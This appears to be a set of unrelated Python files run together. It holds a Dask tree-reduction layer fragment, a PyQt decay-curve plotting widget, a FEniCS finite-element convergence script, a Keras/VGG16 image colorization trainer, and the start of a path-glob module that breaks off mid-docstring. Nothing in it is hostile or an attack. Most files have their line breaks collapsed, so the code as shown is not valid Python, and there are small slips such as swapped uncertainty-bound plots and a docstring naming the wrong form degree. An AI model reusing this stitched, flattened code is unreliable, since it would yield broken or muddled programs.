self.name_input, self.npartitions_input, self.concat_func, self.tree_node_func, finalize_func=self.finalize_func, split_every=self.split_every, split_out=self.split_out, output_partitions=output_partitions, tree_node_name=self.tree_node_name, annotations=self.annotations, ) def cull(self, keys, all_keys): """Cull a DataFrameTreeReduction HighLevelGraph layer""" deps = { (self.name, 0): { (self.name_input, 
i) for i in range(self.npartitions_input) } } output_partitions = self._keys_to_output_partitions(keys) if output_partitions != set(self.output_partitions): culled_layer = self._cull(output_partitions) return culled_layer, deps else: return self, deps def __dask_distributed_pack__(self, *args, **kwargs): from distributed.protocol.serialize import to_serialize # Pickle the (possibly) user-defined functions here _concat_func = to_serialize(self.concat_func) _tree_node_func = to_serialize(self.tree_node_func) if self.finalize_func: _finalize_func = to_serialize(self.finalize_func) else: _finalize_func = None return { "name": self.name, "name_input": self.name_input, "npartitions_input": self.npartitions_input, "concat_func": _concat_func, "tree_node_func": _tree_node_func, "finalize_func": _finalize_func, "split_every": self.split_every, "split_out": self.split_out, "output_partitions": self.output_partitions, "tree_node_name": self.tree_node_name, } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.protocol.serialize import to_serialize # Materialize the layer raw = cls(**state)._construct_graph() # Convert all keys to strings and dump tasks raw = {stringify(k): stringify_collection_keys(v) for k, v in raw.items()} keys = raw.keys() | dsk.keys() deps = {k: keys_in_tasks(keys, [v]) for k, v in raw.items()} # Must use `to_serialize` on the entire task. # This is required because the task-tuples contain `Serialized` # function objects instead of real functions. Using `dumps_task` # may or may not correctly wrap the entire tuple in `to_serialize`. # So we use `to_serialize` here to be explicit. When the task # arrives at a worker, both the `Serialized` task-tuples and the # `Serialized` functions nested within them should be deserialzed # automatically by the comm. return {"dsk": toolz.valmap(to_serialize, raw), "deps": deps}
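# ---------------------------------------------------------------------------
# Illustrative check (not part of the layer implementations above): exercises
# two helpers defined in this module with the same toy inputs as their
# doctests, plus the width/height bookkeeping that
# DataFrameTreeReduction.__init__ performs for 100 input partitions and
# split_every=32.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    # reshapelist nests a flat sequence into the requested shape
    assert reshapelist((2, 3), range(6)) == [[0, 1, 2], [3, 4, 5]]

    # fractional_slice turns a "fractional" overlap key into a getitem task
    assert fractional_slice(("x", 5.1), {0: 2}) == (
        operator.getitem,
        ("x", 5),
        (slice(-2, None, None),),
    )

    # tree widths as computed in DataFrameTreeReduction.__init__:
    # 100 -> ceil(100 / 32) = 4 -> ceil(4 / 32) = 1, so height == 3
    parts, widths = 100, [100]
    while parts > 1:
        parts = math.ceil(parts / 32)
        widths.append(parts)
    assert widths == [100, 4, 1]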
import numpy as np from PyQt5 import QtCore, QtWidgets import pyqtgraph as pg from .ATEMWidget import ATEMWidget pg.setConfigOption('background', 'w') pg.setConfigOption('foreground', 'k') pg.setConfigOptions(antialias=True) class DecayWidget(ATEMWidget): """docstring for LocWidget""" def __init__(self, parent): super().__init__(parent) self.parent = parent self.lockYRange = False self.plotYmin = 1. self.plotYmax = 2. self.dataYmin = 1. self.dataYmax = 2. self.init_ui() self.show() def init_ui(self): """ Docstring """ # Make the background white palette = self.palette() palette.setColor(self.backgroundRole(), QtCore.Qt.white) self.setPalette(palette) self.titleLabel = QtWidgets.QLabel() self.titleLabel.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) self.locLabel = QtWidgets.QLabel('') self.locLabel.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter) self.optLabel = QtWidgets.QLabel('') self.optLabel.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter) self.plotWidget = pg.PlotWidget() self.plotWidget.setLogMode(x=True, y=True) self.plotWidget.setLabel('left', 'dB/dt') self.plotWidget.setLabel('bottom', 'Time', units='s') legend = self.plotWidget.addLegend(offset=(450, 30)) self.plotWidget.showGrid(x=True, y=True) self.obsPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='k', pen={'color': 'k', 'width': 2}, name='Obs.') self.obsNegPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='r', pen=None, name=None) self.predPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='b', pen={'color': 'b', 'width': 2}, name='Pred.') self.selectedTimeLine = pg.InfiniteLine(angle=90, movable=False, pen={'color':'k', 'width':2, 'style':QtCore.Qt.DotLine}) self.lowerPlot = pg.PlotDataItem() self.upperPlot = pg.PlotDataItem() uncertBounds = pg.FillBetweenItem(self.lowerPlot, self.upperPlot, 0.8) # Crosshair self.chvLine = pg.InfiniteLine(angle=90, movable=False, pen={'color':'k', 'width':0.25}) self.chhLine = pg.InfiniteLine(angle=0, movable=False, pen={'color':'k', 'width':0.25}) self.plotWidget.addItem(self.chvLine, ignoreBounds=True) self.plotWidget.addItem(self.chhLine, ignoreBounds=True) self.plotWidget.addItem(self.obsPlot) self.plotWidget.addItem(self.obsNegPlot) self.plotWidget.addItem(self.predPlot) self.plotWidget.addItem(self.selectedTimeLine, ignoreBounds=True) self.plotWidget.addItem(uncertBounds, ignoreBounds=True) self.plotWidget.addItem(self.lowerPlot, ignoreBounds=True) self.plotWidget.addItem(self.upperPlot, ignoreBounds=True) uncertBounds.setZValue(0) self.selectedTimeLine.setZValue(1) self.obsNegPlot.setZValue(3) self.obsPlot.setZValue(2) self.predPlot.setZValue(4) self.chvLine.setZValue(5) self.chhLine.setZValue(6) legend.setZValue(6) l = QtWidgets.QVBoxLayout(self) l.addWidget(self.titleLabel) l.addWidget(self.plotWidget) labelBox = QtWidgets.QHBoxLayout() labelBox.addWidget(self.optLabel) labelBox.addWidget(self.locLabel) l.addLayout(labelBox) self.mouseMoveProxy = pg.SignalProxy(self.plotWidget.scene().sigMouseMoved, rateLimit=30, slot=self.mouseMovedEvent) self.plotWidget.scene().sigMouseClicked.connect(self.clickEvent) def keyPressEvent(self, event): """ Docstring """ key = event.key() if key == QtCore.Qt.Key_Right: signal = {'name':'nextLocInd'} elif key == QtCore.Qt.Key_Left: signal = {'name':'prevLocInd'} elif key == QtCore.Qt.Key_Up: signal = {'name':'nextTimeInd'} elif key == QtCore.Qt.Key_Down: signal = {'name':'prevTimeInd'} elif key == QtCore.Qt.Key_L: if self.lockYRange: self.lockYRange = False else: self.lockYRange = 
True self.updateOptLabel() self.updateYRange() return elif key == QtCore.Qt.Key_R: self.updateYRange(rescale=True) return else: return self.ChangeSelectionSignal.emit(signal) def mouseMovedEvent(self, pos): pos = pos[0] if self.plotWidget.sceneBoundingRect().contains(pos): mousePoint = self.plotWidget.getViewBox().mapSceneToView(pos) string = "<span style='font-size: 12pt'>t={:.2e}</span>" self.locLabel.setText(string.format(10**mousePoint.x())) self.chvLine.setPos(mousePoint.x()) self.chhLine.setPos(mousePoint.y()) def clickEvent(self, event): if self.plotWidget.sceneBoundingRect().contains(event.scenePos()): mousePoint = self.plotWidget.getViewBox().mapSceneToView(event.scenePos()) signal = {'name':'closestTime', 't':10**mousePoint.x()} self.ChangeSelectionSignal.emit(signal) else: pass def setLocation(self, loc): """ Docstring """ t = loc.t.values obs = loc.dBdt_Z.values nInd = obs < 0. self.obsPlot.setData(t, np.abs(obs)) self.obsNegPlot.setData(t[nInd], np.abs(obs[nInd])) if loc.dBdt_Z_pred.any(): pred = loc.dBdt_Z_pred.values self.predPlot.setData(t, pred) if loc.dBdt_Z_uncert.any(): lower = obs - loc.dBdt_Z_uncert.values upper = obs + loc.dBdt_Z_uncert.values lower[lower < 0.] = obs.min()/100. self.upperPlot.setData(t, lower) self.lowerPlot.setData(t, upper) self.plotWidget.setXRange(np.log10(t.min()), np.log10(t.max())) self.updateYRange(yMin=np.log10(np.abs(obs).min()), yMax=np.log10(np.abs(obs).max())) self.titleLabel.setText('{}'.format(loc.locInd.iloc[0])) def updateYRange(self, yMin=None, yMax=None, rescale=False): if yMin is not None: self.dataYmin = yMin if yMax is not None: self.dataYmax = yMax if not self.lockYRange: self.plotYmin = self.dataYmin self.plotYmax = self.dataYmax if rescale: if self.dataYmin < self.plotYmin: self.plotYmin = self.dataYmin if self.dataYmax > self.plotYmax: self.plotYmax = self.dataYmax self.plotWidget.setYRange(self.plotYmin, self.plotYmax) def setTime(self, time): """ docstring """ t = time.iloc[0].t self.selectedTimeLine.setPos(np.log10(t)) def updateOptLabel(self): if self.lockYRange: self.optLabel.setText("Lock Y-Range") else: self.optLabel.setText("")
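# ---------------------------------------------------------------------------
# Hedged sketch (assumptions, not part of the widget above): setLocation()
# reads loc.t, loc.dBdt_Z, loc.dBdt_Z_pred, loc.dBdt_Z_uncert and loc.locInd
# through .values/.iloc, so `loc` is presumably a pandas DataFrame slice with
# one row per time gate. The values below are invented, and driving the
# widget requires a running Qt application plus an ATEMWidget-compatible
# parent, so the snippet is left commented out.
#
#   import pandas as pd
#   loc = pd.DataFrame({
#       'locInd': 0,
#       't': np.logspace(-5, -2, 20),              # gate times [s]
#       'dBdt_Z': np.logspace(-6, -9, 20),         # observed decay
#       'dBdt_Z_pred': np.logspace(-6, -9, 20),
#       'dBdt_Z_uncert': 0.05 * np.logspace(-6, -9, 20),
#   })
#   widget = DecayWidget(parent)                   # parent: ATEMWidget container
#   widget.setLocation(loc)
#   widget.setTime(loc.iloc[[0]])
# ---------------------------------------------------------------------------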
from dolfin import * import numpy import sympy import sympy_interface as S import tabulate parameters["form_compiler"]["cpp_optimize"] = True set_log_level(ERROR) ### utils ################################################################# def my_mixed_function_space(Vs): """ My convenient handler for mixed function space. """ M = MixedFunctionSpace(Vs) def setter(u, ui): # impure setter for i in range(len(Vs)): assign(u.sub(i), interpolate(ui[i], Vs[i])) return u def getter(u): ui = u.split() vi = [] for i in range(len(Vs)): vi.append(interpolate(ui[i], Vs[i])) return vi return (M, setter, getter) def compute_error(u_h, u_ext, V): u_h_V = interpolate(u_h, V) u_ext_V = interpolate(u_ext, V) e = Function(V) e.vector()[:] = u_h_V.vector() - u_ext_V.vector() return e def calc_rate(hs, data): """ Compute the rate of converge by tabulating the successive slopes.""" hs = numpy.array(hs) data = numpy.array(data) tmp = numpy.diff(numpy.log(data))/numpy.diff(numpy.log(hs)) rate = numpy.zeros(data.size) rate[1:] = tmp return rate def print_conv_rate_table(hs, ds, names, h_alt = None): """ Convergence rate printer. """ # formatters h_fmt = lambda x: "{0:.4f}".format(x) data_fmt = ".4e" # tabulate converts numeric str to number # so this has to be set at the end rate_fmt = lambda x: "{0:.2f}".format(x) if x != 0 else "" # make table if h_alt is None: table = [map(h_fmt, hs)] else: table = [h_alt] header = [names[0]] for i in range(len(ds)): table.append(ds[i]) table.append(map(rate_fmt, calc_rate(hs, ds[i]))) header.append(names[i + 1]) header.append("rate") table = zip(*table) s = tabulate.tabulate(table, headers = header, floatfmt = data_fmt) return s def random_perturb_mesh(mesh, percentage, deep_copy = True, preserve_boundary = True): """ Randomly perturb a mesh. 
Input mesh - input mesh percentage - maximum amount of the perturbation as a percentage of hmin deep_copy - whether to copy the mesh before perturbing it preserve_boundary - whether to move the vertices on the boundary Output rmesh - the perturbed mesh """ # Preparation if percentage == 0.0: return mesh if deep_copy: rmesh = Mesh(mesh) else: rmesh = mesh h = rmesh.hmin() # Perturb xs = rmesh.coordinates() dx = numpy.random.rand(*(xs.shape)) * percentage * h # Preserve the boundary if preserve_boundary: boundary_mesh = BoundaryMesh(rmesh, "exterior") bv = boundary_mesh.entity_map(0).array() dx[bv] = 0.0 # Move rmesh.coordinates()[:] = xs + dx return rmesh ### 3d-2-form ############################################################# def make_spaces(pair_name, degree, mesh): if pair_name[1] == "+": W = FunctionSpace(mesh, "BDM", degree) Wb = FunctionSpace(mesh, "BDM", degree + 1) DWb = FunctionSpace(mesh, "DG", degree) r = 1 else: W = FunctionSpace(mesh, "RT", degree) Wb = FunctionSpace(mesh, "RT", degree + 1) DWb = FunctionSpace(mesh, "DG", degree + 1) r = 0 if pair_name[0] == "+": V = FunctionSpace(mesh, "N2curl", degree + r) Vb = FunctionSpace(mesh, "N2curl", degree + r + 1) DVb = FunctionSpace(mesh, "BDM", degree + r) else: V = FunctionSpace(mesh, "N1curl", degree + r) Vb = FunctionSpace(mesh, "N1curl", degree + r + 1) DVb = FunctionSpace(mesh, "RT", degree + r + 1) return (V, W, Vb, Wb, DVb, DWb) def make_data(switch): u = sympy.Matrix(sympy.sympify( """ ((cos(pi*x)+3)*sin(pi*y)*sin(pi*z), sin(pi*x)*(cos(pi*y)+2)*sin(pi*z), sin(pi*x)*sin(pi*y)*(cos(pi*z)+2)) """)) if switch[0] == "T": l1 = sympy.Matrix(sympy.sympify("(sin(pi*x), -sin(pi*y), 0)")) else: l1 = sympy.zeros(3, 1) if switch[1] == "T": l2 = sympy.Matrix(sympy.sympify( """ (( 1, 2, -1), ( 2, -2, 0), ( 1, 3, 1)) """)) else: l2 = sympy.zeros(3, 3) if switch[2] == "T": l3 = sympy.Matrix(sympy.sympify( """ (( 1, 0, -1), ( 0, -1, 0), ( 1, 2, 1)) """)) else: l3 = sympy.zeros(3, 3) if switch[3] == "T": l4 = sympy.Matrix(sympy.sympify("(1, 2, -1)")) else: l4 = sympy.zeros(3, 1) if switch[4] == "T": l5 = sympy.Matrix(sympy.sympify( """ (( 10, 0, 0), ( 0, 10, 0), ( 0, 0, 0)) """)) else: l5 = sympy.zeros(3, 3) # compute data in sympy du = S.div(u) sigma = S.curl(u) + l2 * u dsigma = S.curl(sigma) f = dsigma + l3 * sigma - S.grad(du) - S.grad(l1.dot(u)) + l4 * du + l5 * u # convert to FEniCS f = Expression(S.sympy2exp(f)) ext_sols = map(Expression, map(S.sympy2exp, (sigma, dsigma, u, du))) lots = map(Expression, map(S.sympy2exp, (l1, l2, l3, l4, l5))) return (f, lots, ext_sols) def solve_2_laplacian(pair_name, mesh, degree, f, lots, ext_sols): """ Solve the 1-form Laplacian with lower-order terms l1--l5 and right-hand side f using the pair of spaces given by pair_name. Then compute the error using the given exact solution. 
""" # solve (l1, l2, l3, l4, l5) = lots (V, W, Vb, Wb, DVb, DWb) = make_spaces(pair_name, degree, mesh) (M, setter, getter) = my_mixed_function_space([V, W]) (sigma, u) = TrialFunctions(M) (tau, v) = TestFunctions(M) lhs = (dot(sigma, tau) - dot(u, curl(tau)) - dot(dot(l2, u), tau) + dot(curl(sigma), v) + div(u) * div(v) + dot(l1, u) * div(v) + dot(dot(l3, sigma), v) + dot(l4, v) * div(u) + dot(dot(l5, u), v)) * dx rhs = dot(f, v) * dx A, b = assemble_system(lhs, rhs) solver = PETScLUSolver('mumps') solver.set_operator(A) m = Function(M) solver.solve(m.vector(), b) (sigma_h, u_h) = getter(m) # compute errors (sigma_ext, dsigma_ext, u_ext, du_ext) = ext_sols error = compute_error(sigma_h, sigma_ext, Vb) esigma = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(project(curl(sigma_h), DVb), dsigma_ext, DVb) edsigma = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(u_h, u_ext, Wb) eu = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(project(div(u_h), DWb), du_ext, DWb) edu = numpy.sqrt(assemble(inner(error, error) * dx)) return (esigma, edsigma, eu, edu) def exp(pair_name, degree, switch, meshes): (f, lots, ext_sols) = make_data(switch) hs = []; esigmas = []; edsigmas = []; eus = []; edus = [] for mesh in meshes: h = mesh.hmin() (esigma, edsigma, eu, edu) = solve_2_laplacian( pair_name, mesh, degree, f, lots, ext_sols) hs.append(h) esigmas.append(esigma) edsigmas.append(edsigma) eus.append(eu) edus.append(edu) return (hs, [esigmas, edsigmas, eus, edus]) def mesh_maker(m): mesh = UnitCubeMesh(m, m, m) mesh = random_perturb_mesh(mesh, 0.20, deep_copy = True, preserve_boundary = True) return mesh pairs = ["++", "+-", "-+", "--"] degrees = [2] switches = ["FFFFF", "TFFFF", "FTFFF", "FFTFF", "FFFTF", "FFFFT"] for degree in degrees: for pair_name in pairs: for switch in switches: ms = [2, 4, 8] meshes = map(mesh_maker, ms) (hs, es) = exp(pair_name, degree, switch, meshes) print("[pair: " + pair_name + " deg: " + str(degree) + " lots: " + switch + "]") print(print_conv_rate_table(hs, es, ["h", "sigma", "dsigma", "u", "du"], h_alt = ms)) print("")
from keras.models import Sequential, model_from_json from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape from keras.layers import Merge from keras.layers.convolutional import UpSampling2D, ZeroPadding2D, Convolution2D, MaxPooling2D,Conv2D from keras.utils import np_utils from keras.layers.normalization import BatchNormalization from keras.applications.vgg16 import VGG16 import numpy as np import matplotlib.pyplot as plt import matplotlib import os, shutil import theano from PIL import Image from numpy import * from sklearn.utils import shuffle from sklearn.cross_validation import train_test_split from skimage.color import rgb2lab import skimage.color as color # General parameters img_rows, img_cols = 96, 96 # Image dimensions after resizing bin_num = 20 # For classification : Since a and b channel contains continous value from -100 to 100, we bin them to several classes input_channels = 3 # The paper use 3 duplicated channel as input since pre-trained network has 3 channel, but we can use 1 if we are not using VGG-16 test_img_num = 60 # Use first-n files in the data folder to test the model lab_channels = ['l', 'a', 'b'] # Cnn model parameters era = 1000 epoch = 3 batch_size = 100 validation_split = 0.1 # Paths img_input_path = "./combined/" img_output_path = "./predict_output_concat_vgg/" img_reconstructed_path = "./reconstructed_input_after_bining/" img_channels_path = "./channels_img/" def save_img_of_channel(img_lab, channel, name="img"): img_lab_cp = img_lab.copy() # Delete the rest channels by setting them to 0 if channel == 'l': img_lab_cp[:,:,1:] = 0 elif channel == 'a': img_lab_cp[:,:,0] = 0 img_lab_cp[:,:,2] = 0 elif channel == 'b': img_lab_cp[:,:,:2] = 0 else: print "[ERROR!!] The channel should be 'l', 'a' or 'b' " return img_rgb_channel = color.lab2rgb(img_lab_cp) im = Image.fromarray((img_rgb_channel * 255).astype(uint8)) im.save(img_channels_path + name + "_" + channel + ".jpg", "jpeg") def save_image_by_channels(img_lab, name): # Seperate the image channels L a* and b* for i in xrange(0, len(lab_channels)): img = img_lab[:,:,i] save_img_of_channel(img_lab, lab_channels[i], name=name) def reconstruct_image_by_lab_channels(img_l, img_a, img_b): img = array([img_l.T, img_a.T, img_b.T]).T img_rgb_channel = color.lab2rgb(img) im = Image.fromarray((img_rgb_channel * 255).astype(uint8)) return im def get_img_ab_binned(img_lab): img_a = img_lab[:,:,1] img_b = img_lab[:,:,2] img_a_binned = ((img_a + 100) * bin_num) / 200 img_b_binned = ((img_b + 100) * bin_num) / 200 return img_a_binned.astype(int), img_b_binned.astype(int) def get_img_ab_unbinned(img_a_binned, img_b_binned): img_a_unbinned = ((img_a_binned * 200) / bin_num) - 100.0 img_b_unbinned = ((img_b_binned * 200) / bin_num) - 100.0 return img_a_unbinned, img_b_unbinned def save_input_image_after_bining(img_lab, name='img'): # Use this function to test how bin_num affect the original input image img_a_binned, img_b_binned = get_img_ab_binned(img_lab) img_a_unbinned, img_b_unbinned = get_img_ab_unbinned(img_a_binned, img_b_binned) im = reconstruct_image_by_lab_channels(img_lab[:,:,0], img_a_unbinned, img_b_unbinned) im.save(img_reconstructed_path + name + "_reconstructed_after_bining.jpg", "jpeg") def get_duplicated_l_channel(img_l, channels): img_l_duplicated = [] for i in xrange(channels): img_l_duplicated.append(img_l.T) result = array(img_l_duplicated).T return result ''' Start Here ''' imlist = os.listdir(img_input_path) imlist.sort() # ''' For playing with lab images and also testing the affect of 
bining ''' for i in xrange(test_img_num): # Save image of each channel (l, a, b) img_rgb = array(Image.open(img_input_path + imlist[i]).resize((img_rows,img_cols))) img_lab = rgb2lab(img_rgb) save_image_by_channels(img_lab, imlist[i]) # Test the color distortion of input image after bining save_input_image_after_bining(img_lab, name = imlist[i]) ''' For training and testing cnn model ''' X = [] # Traning inputs X_l = [] # Keep the l channel to reconstruct the image from lab to rgb Y = [] # Traning labels count = 1; for img in imlist: print "loading data .... " + str(count) + "/" +str(len(imlist)) img_rgb = array(Image.open(img_input_path + img).resize((img_rows,img_cols))) img_lab = rgb2lab(img_rgb) img_a_binned, img_b_binned = get_img_ab_binned(img_lab) img_y = np.append(img_a_binned.flatten(), img_b_binned.flatten()) y = np_utils.to_categorical(img_y, bin_num) X.append(get_duplicated_l_channel(img_lab[:,:,0], input_channels)) # The paper use 3 duplicated l channel as network input X_l.append(img_lab[:,:,0]) Y.append(y) count += 1 X = array(X).astype(np.float32) Y = array(Y) X_l = array(X_l) X = X - 45.0 print X.shape print Y.shape l_model = VGG16(weights='imagenet', include_top=False, input_shape=(img_rows, img_cols, 3)) l_model.summary() # Conv-Pooling Layers model1 = Sequential() model1.add(ZeroPadding2D((1,1), name='m1_c2', input_shape=(img_rows, img_cols, input_channels))) model1.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m1_c3', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c4', )) model1.add(Convolution2D(64, 3, 3, border_mode='same', name='m1_c5', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c6', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c7')) model1.add(Convolution2D(128, 3, 3, border_mode='same', name='m1_c8', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c9')) model1.add(Convolution2D(128, 3, 3, border_mode='same', name='m1_c10', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c11', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c12')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c13', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c14')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c15', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c16')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c17', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c18', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c19')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c20', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c21')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c22', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c23')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c24', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c25', strides=(2,2))) for i in xrange(0, len(model1.layers), 1): model1.layers[i].set_weights(l_model.layers[i].get_weights()) model1.layers[i].trainable = False model1.add(Convolution2D(256, 1, 1, name='m1_c31', activation='relu')) model1.add(BatchNormalization(name='m1_c32')) model1.add(UpSampling2D((2,2), name='m1_c33')) model1.summary() model2 = Sequential() model2.add(ZeroPadding2D((1,1), name='m2_c2', input_shape=(img_rows, img_cols, input_channels))) model2.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), 
name='m2_c3', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c4', )) model2.add(Convolution2D(64, 3, 3, border_mode='same', name='m2_c5', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c6', strides=(2,2))) #model2.add(ZeroPadding2D((1,1), name='m2_c7')) model2.add(Convolution2D(128, 3, 3, border_mode='same', name='m2_c8', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c9')) model2.add(Convolution2D(128, 3, 3, border_mode='same', name='m2_c10', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c11', strides=(2,2))) #model2.add(ZeroPadding2D((1,1), name='m2_c12')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c13', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c14')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c15', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c16')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c17', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c18', strides=(2,2))) for i in xrange(0, len(model2.layers), 1): model2.layers[i].set_weights(l_model.layers[i].get_weights()) model2.layers[i].trainable = False model2.add(BatchNormalization(name='m2_c32')) model2.summary() model3 = Sequential() model3.add(ZeroPadding2D((1,1), name='m3_c2', input_shape=(img_rows, img_cols, input_channels))) model3.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m3_c3', activation='relu')) #model3.add(ZeroPadding2D((1,1), name='m3_c4', )) model3.add(Convolution2D(64, 3, 3, border_mode='same', name='m3_c5', activation='relu')) model3.add(MaxPooling2D((2,2), name='m3_c6', strides=(2,2))) #model3.add(ZeroPadding2D((1,1), name='m3_c7')) model3.add(Convolution2D(128, 3, 3, border_mode='same', name='m3_c8', activation='relu')) #model3.add(ZeroPadding2D((1,1), name='m3_c9')) model3.add(Convolution2D(128, 3, 3, border_mode='same', name='m3_c10', activation='relu')) model3.add(MaxPooling2D((2,2), name='m3_c11', strides=(2,2))) for i in xrange(0, len(model3.layers), 1): model3.layers[i].set_weights(l_model.layers[i].get_weights()) model3.layers[i].trainable = False model3.add(BatchNormalization(name='m3_c32')) model3.summary() model4 = Sequential() model4.add(ZeroPadding2D((1,1), name='m4_c2', input_shape=(img_rows, img_cols, input_channels))) model4.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m4_c3', activation='relu')) #model4.add(ZeroPadding2D((1,1), name='m4_c4', )) model4.add(Convolution2D(64, 3, 3, border_mode='same', name='m4_c5', activation='relu')) model4.add(MaxPooling2D((2,2), name='m4_c6', strides=(2,2))) for i in xrange(0, len(model4.layers), 1): model4.layers[i].set_weights(l_model.layers[i].get_weights()) model4.layers[i].trainable = False model4.add(BatchNormalization(name='m4_c32')) model4.summary() print "\n\n\n\n===============================" model1.summary() model2.summary() print "===============================\n\n\n" model5 = Sequential() model5.add(Merge([model1, model2], mode = 'concat', name='m5_c0')) # model5.add(ZeroPadding2D((1,1), name='m5_c1')) model5.add(Convolution2D(128, 3, 3, border_mode='same', name='m5_c2', activation='relu')) model5.add(UpSampling2D((2,2), name='m5_c33')) model5.summary() model6 = Sequential() model6.add(Merge([model5, model3], mode = 'concat', name='m6_c0')) # model6.add(ZeroPadding2D((1,1), name='m6_c1')) model6.add(Convolution2D(64, 3, 3, border_mode='same', name='m6_c2', activation='relu')) 
model6.add(UpSampling2D((2,2), name='m6_c33')) model6.summary() print "\n\n\nModel7" model7 = Sequential() model7.add(Merge([model6, model4], mode = 'concat', name='m7_c0')) model7.add(Convolution2D(3, 3, 3, border_mode='same', name='m7_c4', activation='relu')) model7.add(UpSampling2D((2,2), name='76_c33')) model7.summary() print "\n\n\nModel8" model8 = Sequential() model8.add(ZeroPadding2D((0,0), name='m8_c2', input_shape=(img_rows, img_cols, input_channels))) model8.summary() print "\n\n\nModel9" model9 = Sequential() model9.add(Merge([model7, model8], mode = 'concat', name='m9_c0')) model9.add(Convolution2D(2 * bin_num, 3, 3, border_mode='same', name='m9_c4', activation='relu')) model9.add(Flatten()) model9.summary() model9.add(Reshape((img_rows * img_cols * 2, bin_num))) model9.add(Activation('softmax', name="act")) model9.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=["acc"]) model9.summary() for j in xrange(era): hist = model9.fit([X[test_img_num:], X[test_img_num:], X[test_img_num:], X[test_img_num:], X[test_img_num:]], Y[test_img_num:], batch_size=batch_size, nb_epoch=epoch, verbose=1, validation_split=validation_split, shuffle=True) if j % 10 == 0: for i in xrange(0, test_img_num): xx = X[i].flatten().reshape(1, img_rows, img_cols, input_channels) result = model9.predict_classes([xx, xx, xx, xx, xx]) print result reshaped = result.reshape(2, img_rows, img_cols) a, b = get_img_ab_unbinned(reshaped[0], reshaped[1]) im = reconstruct_image_by_lab_channels(X_l[i], a, b) im.save(img_output_path + imlist[i] + "_predicted_" + "era_" +str(j) + ".jpg", "jpeg") model_json = model9.to_json() with open("colorize_with_pretrain.json", "w") as json_file: json_file.write(model_json) model9.save_weights("colorize_with_pretrain.hdf5", overwrite=True)
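

# ---------------------------------------------------------------------------
# Hedged example (not part of the original script): a numpy-only check of the
# a/b binning round trip used above. With bin_num bins over [-100, 100], the
# error of get_img_ab_unbinned(get_img_ab_binned(...)) should stay below one
# bin width, i.e. 200.0 / bin_num. The random lab image is synthetic and the
# function is defined but not called during training.
def _demo_ab_binning_roundtrip():
    img_lab_demo = np.zeros((4, 4, 3))
    img_lab_demo[:, :, 1] = np.random.uniform(-100, 99, (4, 4))  # a channel
    img_lab_demo[:, :, 2] = np.random.uniform(-100, 99, (4, 4))  # b channel
    a_bin, b_bin = get_img_ab_binned(img_lab_demo)
    a_rec, b_rec = get_img_ab_unbinned(a_bin, b_bin)
    bin_width = 200.0 / bin_num
    assert np.max(np.abs(a_rec - img_lab_demo[:, :, 1])) < bin_width
    assert np.max(np.abs(b_rec - img_lab_demo[:, :, 2])) < bin_width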
# Copyright 2013 Dietrich Epp. # # This file is part of HeaderFix. HeaderFix is distributed under the terms of # the 2-clause BSD license. See LICENSE.txt for details. """Patterns for matching file paths.""" import fnmatch class PathPattern(object): """A pattern that matches paths using globbing. The pattern can be rooted or unrooted. Rooted patterns match against the beginning of the path, and unrooted patterns match against any part of the path. For example, the rooted pattern "/a/*" matches "/a/b" but not "/dir/a/b". The unrooted pattern "a/*" matches both "/a/b" and "/dir/a/b". """ __slots__ = ['rooted', 'parts'] def __init__(self, rooted, parts): self.rooted = bool(rooted) self.parts = tuple(parts) assert self.parts def match_dir(self, name): """Apply the pattern against a directory. Returns (match, patterns), where "match" is true if the directory itself matches the pattern, and "patterns" is a set of patterns relative to the directory. """ match = False patterns = [] if self.match_part(name, self.parts[0]): if (len(self.parts) == 1 or (len(self.parts) == 2 and not self.parts[1])): match = True else: patterns.append(self.__class__(True, self.parts[1:])) if not self.rooted: patterns.append(self) return match, patterns def match_file(self, name): """Determine whether this pattern matches a 